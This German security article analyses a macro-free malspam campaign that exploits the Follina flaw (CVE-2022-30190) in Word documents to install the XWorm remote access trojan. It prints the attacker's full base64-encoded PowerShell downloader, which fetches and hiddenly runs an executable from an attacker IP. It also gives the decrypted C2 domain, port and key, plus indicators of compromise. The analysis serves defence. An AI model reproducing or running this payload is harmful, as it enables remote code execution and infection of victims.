Schadsoftware-Infektion via Office-Dokumente Analyse eines Makro-freien Malware-Angriffs

Ein Gastbeitrag von Paul Apostolescu Lesedauer: 6 min

Anbieter zum Thema

Im Jahr 2022 hat Microsoft damit begonnen, VBA-Makros für Microsoft Office standardmäßig zu deaktivieren. Ziel war es zu verhindern, dass Angreifer Makros nutzen, um eine Malware-Payload zu platzieren. Aber wie so oft, ist es Angreifern gelungen, sich rasch an die Veränderungen anzupassen und neue Wege, sprich Angriffsvektoren zu finden.

Cyberkriminelle finden immer wieder neue Wege, um Malware auf die Systeme ihrer Opfer zu laden. Selbst bei deaktivierten Office-Makros gibt es inzwischen Hintertüren für Ransomware und Remote Access Trojaner.
Cyberkriminelle finden immer wieder neue Wege, um Malware auf die Systeme ihrer Opfer zu laden. Selbst bei deaktivierten Office-Makros gibt es inzwischen Hintertüren für Ransomware und Remote Access Trojaner.
(Bild: Alexander Limbach - stock.adobe.com)

Im ersten Quartal 2023 konnten die Sicherheitsforscher der Vipre Security Group einen abrupten Anstieg von Microsoft OneNote-Dateien beobachten, die als Angriffsvektor genutzt wurden – geeignet verschiedene Malware-Familien wie AsyncRAT, RedLine, Qakbot usw. zu verbreiten. Parallel dazu wurde verstärkt sogenanntes HTML Smuggling genutzt, um Schadsoftware unterzubringen. Diesmal stießen die Forscher noch auf eine andere Art der Verbreitung, bei der sich Angreifer die Schwachstelle CVE-2022-30190 zunutze machen konnten.

Bildergalerie
Bildergalerie mit 9 Bildern

Die Schwachstelle CVE-2022-30190, auch unter dem Namen Follina bekannt, wurde im Jahr 2022 entdeckt. Sie nutzt einen legitimen Microsoft-Dienst, Microsoft Support Diagnostic Tool (MSDT), der auf anfälligen Systemen eine Remotecodeausführung ermöglicht. Die Schwachstelle ist nicht neu, wird aber weiterhin ausgenutzt. Dabei kann ein Angreifer auf eine externe Ressource verweisen, die anschließend eine bösartige HTML-Seite aufruft. Diese Seite nutzt den MSDT-URI-Protokoll-Handler, um beliebigen Code oder Befehle auszuführen, z. B. PowerShell. Die Datei msdt.exe wird als untergeordneter Prozess gestartet, sobald das HTML-Dokument in WinWord referenziert wird.

Das Besondere daran ist, dass man kein Microsoft-Dokumentenmakro benötigt, um die Malware zu verteilen. Der Angreifer muss das Opfer nur dazu bringen, das speziell gestaltete Microsoft-Dokument zu öffnen, um die Schwachstelle ausnutzen zu können. Der Angriff lässt sich zudem unabhängig davon ausführen, ob die Datei schreibgeschützt oder im Protection Mode ist – und es ist bei allen Microsoft Office-Versionen möglich.

Erst kürzlich stieß Vipre Labs auf eine Malspam-E-Mail-Kampagne mit einem docx-Dateianhang. Beim Öffnen der Datei erhält das Opfer die Meldung „This document contains a link that may refer to another file. Do you want to update this document with the data from the link files? “ („Dieses Dokument enthält einen Link, der auf eine andere Datei verweisen kann. Möchten Sie dieses Dokument mit den Daten aus den Verknüpfungsdateien aktualisieren?“). Die Datei enthält auch eine willkürlich erstellte ID und Karteninformationen.

Das Opfer könnte fälschlich davon ausgehen, dass es sich um eine normale Microsoft-Dokument-Datei handelt. Das aber ist nicht der Fall, denn im Hintergrund laufen nun bösartige Aktivitäten ab. Eines der Beispiele ist eine verdächtige TCP-Verbindung zu 45[.]76[.]53[.]253, die verwendet wird, um bösartige Dateien zu hosten.

Für diese Art von Angriff hat Vipre Labs die im Word-Dokument gespeicherte Datei „document.xml.rel“ untersucht. Der Angreifer verändert diese Datei, und sie enthält zudem eine bösartige externe URL-Ressource, die aufgerufen wird, sobald das Opfer das Dokument anklickt. In „document.xml.rels“ steckt ein Relationship-Tag vom Typ „oleObject, targetMode external“, das auf eine verdächtige URL verweist. Am Ende der URL findet sich ein „!“-Zeichen, das eine wichtige Rolle beim Auslösen der HTML-Payload spielt.

Der gefundene referenzierte externe Ressourcenlink hxxp://45[.]76[.]53[.]253/24[.]html enthält ein Javascript, das MSDT und Invoke-Expression verwendet, um ein PowerShell-Skript auszuführen, das mit base64 kodiert wurde:

VHJ5IHskd2M9bmV3LW9iamVjdCBzeXN0ZW0ubmV0LndlYmNsaWVudDskd2MuZG93bmxvYWRmaWxlKCJodHRwOi8vNjUuMjEuNzYuMTU3LzA1MjR4ODYxMi5leGUiLCIkRU5WOnRlbXBcd3N0bXAuZXhlIik7fSBDYXRjaCB7RXhpdCgxKTt9OyRjbWQgPSAiJEVOVjp0ZW1wXHdzdG1wLmV4ZSI7U3RhcnQtUHJvY2VzcyAkY21kIC13aW5kb3dzdHlsZSBoaWRkZW4gLUFyZ3VtZW50TGlzdCAiL2MgcnVuZGxsMzIuZXhlIHBjd3V0bC5kbGwsTGF1bmNoQXBwbGljYXRpb24gJGNtZCI7JGNtZCA9ICJjOlx3aW5kb3dzXHN5c3RlbTMyXGNtZC5leGUiO1N0YXJ0LVByb2Nlc3MgJGNtZCAtd2luZG93c3R5bGUgaGlkZGVuIC1Bcmd1bWVudExpc3QgIi9jIHRhc2traWxsIC9mIC9pbSBtc2R0LmV4ZSI7==

Analyse des Powershell-Skripts

Dieses Skript lädt eine auf „hxxp://65[.]21[.]76[.]157/0524×8612[.]exe“ gehostete, ausführbare Datei mit dem Namen „wstmp.exe“ in das Verzeichnis %temp% herunter. Die heruntergeladene Payload wird dann mit Hilfe von „pcwut.dll“ und ihrer Funktion LaunchApplication ausgeführt. Das PowerShell-Skript beendet auch den untergeordneten Prozess msdt.exe, der zum Aufrufen der bösartigen externen Ressource diente. Das Opfer bemerkt die Ausführung des PowerShell-Skripts nicht, da sie aufgrund des Arguments „windowstyle hidden“ im Hintergrund abläuft.

Analyse der bösartigen Datei „wstmp.exe“

Die Sicherheitsforscher der Vipre Labs haben herausgefunden, dass die endgültige Payload für diese Kampagne mit der XWorm-Malware in Verbindung steht. XWorm ist eine ausgefeilte Art von Malware und wurde zusammen mit anderen bösartigen Tools im Dark Web verkauft. Diese Malware wurde in.NET kompiliert und ist ein Beispiel für einen Remote Access-Trojaner. Das analysierte Beispiel hat sich anhand der Dateiinformationen als eine Datei ausgegeben, die mit dem Antivirusprogramm „AVG“ in Verbindung steht. Die für die Ausführung zu verwendenden Zeichenfolgen sind verschlüsselt und werden mit dem Rijndael-Algorithmus entschlüsselt.


Verschlüsselte Daten

Entschlüsselter Wert

Verwendung
   
qnHEPIgMHs/dPMCMgzBbKj+Q1iV2TYINOOe1LpIrICc=   
   
port3000newspm[.]duckdns[.]org   
   
C2-Server   
   
prm15cJXncKmjac47aHAmA==   
   
3000   
   
Port   
   
A2vXrjTo3SRo0CuOifuHJw==   
   
123456789   
   
Schlüssel   
   
Otu6jLKlPOiVYjEK+SKmkQ==   
   
Xwormmm   
   
SPL   
   
GxATa6g51MsEXZHXcfH+uA==   
   
USB.exe   
   
USBNM   

Sobald die Malware mit dem C2-Server des Angreifers verbunden ist, verfügt sie über folgende Eigenschaften und Fähigkeiten:

Jetzt Newsletter abonnieren

Täglich die wichtigsten Infos zur IT-Sicherheit

Mit Klick auf „Newsletter abonnieren“ erkläre ich mich mit der Verarbeitung und Nutzung meiner Daten gemäß Einwilligungserklärung (bitte aufklappen für Details) einverstanden und akzeptiere die Nutzungsbedingungen. Weitere Informationen finde ich in unserer Datenschutzerklärung.

Aufklappen für Details zu Ihrer Einwilligung
  • Ransomware-ähnliches Verhalten (Verschlüsselung und Entschlüsselung von Dateien)
  • Stehlen vertraulicher Daten des Opfers, z. B. Passwörter
  • Ausspionieren des Opfer-Rechners (Keylogging, Webcam- und Mikrofonüberwachung)
  • Durchführen eines Denial-of-Service-Angriffs (DDoS)
  • Herunterfahren oder Neustart des Computers
  • Versteckte virtuelle Netzwerkberechnungen
  • Versteckte Remote-Desktop-Protokollierung (RDP)
  • Sich hartnäckig festsetzen

Wie kann man verhindern, Opfer solcher Angriffe zu werden?

  • Die E-Mail-Adresse des Absenders immer überprüfen
  • Den gesamten Inhalt der E-Mail analysieren
  • Nach Rechtschreib- oder Grammatikfehlern suchen
  • Keine verdächtigen oder unerwartet erhaltenen Links und Dateien anklicken
  • Das Antivirusprogramm kontinuierlich aktualisieren

Indicators of Compromise

EML-Dateien:

  • fbf6e780378c09182e08a438fba6a9e1b79a380c8e07648d0dca23406c4f7c7e
  • 646b68376bedd1a326f2f81caa40fc3a06e10f4af4a6e0101a10ab9bc5ce9cb7
  • f3e831e037ddb46a4cbad7e1d70e58d880f4defdba6c1bfa858ae697c04730ad
  • c8368bf875cc4c23e1b23976c630a52798ed0e6d8754c21d93f9e9f5ddc133eb
  • bda578349aaaa540eff7646d75f1c54e6e743e9f5295dd52a6d5690ccd0c5ef6

Docx-Dateien:

  • 20c49ebbe8f13df1f845726faef7663b50db411a3fb72f0cb4538acaba2db26b
  • 88d921f668be40db6db9aff2cc58544bc82d16a4c3a45a6306f3878daba83e0d
  • 5af433a792c0c3d7995d2eb5fc3105b61344224c127f1b2c509721c3e9700806
  • 61fdd0900f250f934c692ff323196ca78bb9f26524ec12c1b33b1d4fbae550a2
  • f842f32869a80152d421ba78c61bc91a7655c6917dbd58bc0de7f25c1f1b8da4

URLs:

  • hxxp://65[.]21[.]76[.]157/0524×8612[.]exe
  • hxxp://45[.]76[.]53[.]253/24[.]html

XWorm Malware

  • e88cb3502ff2535e7bc40dfb94fa85a7a334bd90054eb2ef01f07b348569bd90

Über den Autor: Paul Apostolescu ist Chief Architect bei Vipre Security.

(ID:49621193)